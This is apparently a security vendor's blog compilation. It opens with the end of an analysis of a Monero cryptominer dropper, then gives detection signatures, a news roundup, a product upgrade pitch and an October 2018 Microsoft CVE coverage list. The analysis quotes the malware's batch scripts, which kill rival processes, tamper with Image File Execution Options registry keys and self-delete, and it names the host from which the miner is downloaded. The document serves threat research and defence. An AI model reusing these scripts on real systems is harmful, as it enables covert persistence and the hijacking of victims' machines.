echo y|cacls %SystemRoot%\System32\WUDHostServices.exe /d everyone
@taskkill /f /im wbmoney.exe
@taskkill /f /im GGtbviewer.exe
taskkill /f /t /im Netohad.pif
taskkill /f /t /im Qrhkveb.com
taskkill /f /t /im Tnntknl.com
taskkill /f /t /im Snwhtdw.bat
taskkill /f /t /im dllhsot.exe
taskkill /f /t /im Tasksvr.exe
taskkill /f /t /im serices.exe
taskkill /f /t /im seever.exe
taskkill /f /t /im mssecsvc.exe
taskkill /f /t /im svchsot.exe
taskkill /f /t /im lsacs.exe
taskkill /f /t /im nsa.exe
taskkill /f /t /im csrs.exe
taskkill /f /im WerFault.exe
taskkill /f /im WScript.exe
taskkill /f /t /im NV-NO.exe
taskkill /f /t /im NV.exe
taskkill /f /t /im Eternalblue-2.2.0.exe
taskkill /f /t /im Eternalchampion-2.0.0.exe
taskkill /f /t /im Doublepulsar-1.3.1.exe
@wmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\system\\explorer.exe'" call Terminate
@wmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\Fonts\\explorer.exe'" call Terminate
@wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate
@reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundllhost.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Systmss.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ystmss.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauc1t.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\2.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nanol.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostr.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss..exe" /v "debugger" /d taskkill.exe /f
@del /q C:\Windows\system\explorer.exe
@del /q C:\Windows\Fonts\explorer.exe
@taskkill /f /t /im lservice.exe
@taskkill /f /t /im ystmss.exe
@taskkill /f /t /im wuauc1t.exe
del %0

Free.bat is then executed as a final cleanup of the install process.


@ECHO OFF
ping -n 2 127.0.0.1>nul
taskkill /f /t /im NV-NO.exe
taskkill /f /t /im NV.exe
taskkill /f /t /im Eternalblue-2.2.0.exe
taskkill /f /t /im Eternalchampion-2.0.0.exe
taskkill /f /t /im Doublepulsar-1.3.1.exe
taskkill /f /im mysqld.exe
taskkill /f /im CPUInfo.exe
taskkill /f /im jvav.exe
ping -n 5 127.0.0.1>nul
schtasks /run /tn "GooglePinginConfigs"
exit

The loaded x64.dll and x86.dll are then responsible for downloading two more component files which are the Install.exe and mado.exe. Install.exe just reinstalls CPUInfo.exe and whole cycle of CPUInfo.exe execution just restarts and persistence is warranted.

Mado.exe goes to bmw.hobuff.info and downloads another file which is the main cryptominer file. This cryptominer disguises itself as another 360.cn component and uses the same icon as the main installer above. Upon careful examination we find that this mines Monero cryptocurrency and is based off the open-sourced XMRig CPU miner.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Downloader.AL_5 (Trojan)
  • GAV: Reconyc.DDA_5 (Trojan)
  • GAV: Madominer.D (Trojan)
  • GAV: Madominer.D_2 (Trojan)
  • GAV: Equation.A (Trojan)
  • GAV: XMRig.XMR_3 (Trojan)

Cyber Security News & Trends

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.


SonicWall Spotlight

“A leader has to be passionate about their work be able to motivate their teams to be equally passionate” With Bill Conner – Authority Magazine

  • Bill Conner, CEO of SonicWall, is interviewed about his career, from his days loading shipping containers all the way to his current role.

Cryptomining Malware Steals Fortnite Gamers’ Bitcoins and Personal Data – SC Magazine (UK)

  • As malware continues to target Fortnite players, SonicWall’s Lawrence Pingree talks about the probable future of kinetic ransomware.

Chart of the Day: Google Plus Never Got off the Ground – Real Money

  • SonicWall CEO Bill Conner weighs in with his thoughts on the importance, or not, of the Google Plus breach.

Cyber Security News

Pentagon Struggling to Meet Cyber Challenges, as Modern Warfare Goes High Tech – The Washington Times

  • The Pentagon wants to avoid another “Beast of Kandahar” situation but is struggling to keep its cybersecurity stronger than its attackers.

New Evidence of Hacked Supermicro Hardware Found in U.S. Telecom – Bloomberg

  • Accusations that China are inserting spying chips into US companies’ hardware are still being made and are spreading to other companies.

Medtronic Disables Pacemaker Programmer Updates Over Hack Concern – Reuters

  • There have been no documented reports of the vulnerability being exploited but the company are taking no chances with peoples’ hearts.

Vietnam Cyber Law Set for Tough Enforcement Despite Google, Facebook Pleas – Reuters

  • Companies will be required to store a wide range of user data and set up offices inside the country.

Heathrow Airport Fined £120,000 Over USB Data Breach Debacle – ZDNet

  • A memory stick with unencrypted private data of airport employees was found by a member of public last year.

Payment-Card-Skimming Magecart Strikes Again: Zero out of Five for Infecting E-Retail Sites – The Register (UK)

  • The British Airways and Ticketmaster attacking toolkit Magecart isn’t going away, this time turning up in a plugin called Shopper Approved that is used by hundreds of e-commerce sites.

This Cryptojacking Mining Malware Pretends to Be a Flash Update – ZDNet

  • The much-maligned Flash software now has the added problem of an imposter program that uses a victim’s computer to mine for the Monero cryptocurrency.

In Case You Missed It

12 Smart Reasons to Upgrade to SonicWall Secure Mobile Access (SMA)

The modern mobile or remote workforce is one businesses’ most valuable resources. Ensuring users have fast and secure anytime, anywhere access to applications, services and networks is a business-critical function.

For many years, the SonicWall Secure Remote Access (SRA) solution was the workhorse for distributed or remote personnel across the world. But technology moves fast. Today’s business environment has more users, applications and services than ever before. Satisfying this need requires a secure, high-performance remote access solution.

That’s why SonicWall introduced Secure Mobile Access (SMA), a unified secure access gateway that enables organization to provide anytime, anywhere and any device access to any application. More memory. More users. More throughput.

The solution’s granular access control policy engine, context-aware device authorization, application-level VPN and advanced authentication with single sign-on enables organizations to move to the cloud with ease, and embrace BYOD and mobility in a hybrid IT environment.

Explore the top 12 reasons organizations are upgrading to SonicWall SMA to deliver the speed, security and user experiences their mobile workforces require.

Shrink Budgets by Going Virtual

Virtualizing your infrastructure provides many benefits, while significantly improving performance needed for today’s secure mobility. Improvements include enhanced scalability and flexibility, reduction in downtime, minimized upfront investment and lower maintenance costs.

Why upgrade: SMA 8200v is a powerful virtual appliance with a quad-core processor and 8 Gb RAM. It delivers high-performance secure remote access — all at a fraction of the cost of a physical appliance.

Go Faster

Having both more and faster processing cores enables SMA to encrypt data-in-motion and with lower latency. The end result is a faster, high-performance experience for end users.

Why upgrade: The SMA series has quad core processors that run at up to 1.8 times the speed of those on the SRA series (single core on EX6000 and dual core on EX7000).

Increase Your Throughput

While speed is important, the ultimate goal is to deliver a seamless user experience. By increasing throughput, you promote better productivity with fast and secure access to mission-critical cloud and on-premises applications.

Why upgrade: SMA appliances have up to 15 times the SSL-VPN throughput of the SRA EX series (1.58 Gbps/400 Mbps/3.75 Gbps vs. 106 Mbps/550Mbps).

Serve More Concurrent Users

The mobile workforce has matured quickly in the past decade. Businesses are serving more remote users than ever before — and usually at the same time. Having a higher number of concurrent user sessions provides greater scalability by enabling more simultaneous user sessions to be active and tracked by firewalls.

Why upgrade: The SMA series offer more scalability from a single appliance for larger numbers of concurrent user sessions compared to the SRA series.

Get More High-Speed Ports

Today’s applications and cloud services are bandwidth hogs. Whether users are accessing sales data from a SaaS application or streaming a video presentation, organizations need the throughout to support bandwidth-intensive applications and high-speed data transfers.

Why upgrade: SMA 8200v supports 2 10-GbE ports and SMA 7200 includes 2 10-GbE ports out-of-the box.

Keep Features, Firmware Current

One of the most important best practices to defend against cyberattack or unknown threats is to always keep patches current. This habit also ensures you’re getting the latest feature updates to take advantage of new capabilities that help reduce costs while embracing trends such as BYOD, mobility and cloud.

Why upgrade: Every SMA firmware version is packed with new features. For example, SMA OS 12.1 is the current recommended firmware that provides advanced features, such as:

  • Federated Single Sign-On (SSO)
  • Face ID AUTH Support
  • Centralized Access Portal for Hybrid IT
  • File-Scanning via SonicWall Capture ATP Sandbox Service

Retain Support, Warrant for Hardware

Delivering secure remote access is a critical IT function that reduces attack surface for cybercriminals. It is imperative that the solution is always fully supported and has a best-in-class warranty — should the need arise.

Why upgrade: The SRA series are approaching End of Life (EOL) and the appliances will not be supported beyond November 2019.

Centralize Management & Reporting

Management and technology oversight are significant cost centers for businesses. By centralizing management and reporting, and automating routine tasks, organizations can drastically reduce administrative overhead. That’s time better spent on core business or security objectives.

Why upgrade: SonicWall Central Management Server (CMS) provides organizations with a single administrative user interface for reporting and management of all SMA appliances. This even includes SSL certificate management and policy roll-outs.

Enhance Resilience & Availability

Downtime happens. But organizations do their best to ensure business continuity and scalability, not to mention service-level agreements are being met. Service providers vastly improve Quality of Service (QoS) and workforce productivity by being in proactive in this area.

Why upgrade: Appliances managed by CMS can be configured as Active/Active or Active/Standby high-availability (HA) clusters for redundancy, availability and reliability. The solution includes Global Traffic Optimizer (GTO) for intelligent load-balancing and universal session persistence in case of failovers.

Store Critical Information with Onboard Memory

While much storage today is outsourced to clouds or servers, having large onboard modules is still a key capability. It allows for the local storage of logs, reports, file transfer inspection, firmware backups and restores, and more.

Why upgrade: The SMA 6200 and 7200 offer storage modules that have 12.5 times the capacity of the SRA series (2 x 500 GB vs. 80 GB).

Reduce Costs by Maximizing Global Usage

Organizations with appliances that are globally distributed can benefit from the fluctuating demands for user licenses due to time differences from off‐work/night hours.

Why upgrade: User licenses no longer need to be applied to individual SMA appliances. With central user licensing, CMS reallocates licenses to managed SMA appliances based on usage.

About SonicWall SMA

SMA is an advanced access security gateway that offers secure access to network and cloud resources from any device. SMA provides centralized, granular, policy-based enforcement of remote and mobile access to any corporate resource delivered using a hardened Linux-based appliance. Available as hardened physical appliances or powerful virtual appliances, SMA fits seamlessly into any existing IT infrastructure.

Microsoft Security Bulletin Coverage for October 2018

SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of October 2018. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2010-3190 MFC Insecure Library Loading Vulnerability
There are no known exploits in the wild.
CVE-2018-8265 Microsoft Exchange Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8320 Windows DNS Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8329 Linux On Windows Elevation Of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8330 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8333 Microsoft Filter Manager Elevation Of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8411 NTFS Elevation of Privilege Vulnerability
ASPY 5282 : Malformed-File exe.MP.38
CVE-2018-8413 Windows Theme API Remote Code Execution Vulnerability
ASPY 5283 : Malformed-File theme.MP
CVE-2018-8423 Microsoft JET Database Engine Remote Code Execution Vulnerability
ASPY 5271 : Malformed-File mdb.TL.4
ASPY 5272 : Malformed-File mdb.TL.5
CVE-2018-8427 Microsoft Graphics Components Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8432 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8448 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8453 Win32k Elevation of Privilege Vulnerability
ASPY 5284 : Malformed-File exe.MP.39
CVE-2018-8460 Internet Explorer Memory Corruption Vulnerability
IPS 13639 : Internet Explorer Memory Corruption Vulnerability (OCT 18) 1
CVE-2018-8472 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8473 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8480 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8481 Windows Media Player Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8482 Windows Media Player Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8484 DirectX Graphics Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8486 DirectX Information Disclosure Vulnerability
IPS 5285 : Malformed-File exe.MP.40
CVE-2018-8488 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8489 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8490 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8491 Internet Explorer Memory Corruption Vulnerability
IPS 13640 : Internet Explorer Memory Corruption Vulnerability (OCT 18) 2
CVE-2018-8492 Device Guard Code Integrity Policy Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8493 Windows TCP/IP Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8494 MS XML Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8495 Windows Shell Remote Code Execution Vulnerability
IPS 13637 : Windows Shell Remote Code Execution Vulnerability (OCT 18) 1
CVE-2018-8497 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8498 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8500 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8501 Microsoft PowerPoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8502 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8503 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8504 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8505 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13636 : Chakra Scripting Engine Memory Corruption Vulnerability (OCT 18) 1
CVE-2018-8506 Microsoft Windows Codecs Library Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8509 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8510 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8511 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8512 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8513 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8518 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8527 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8530 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8531 Azure IoT Device Client SDK Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8532 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8533 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.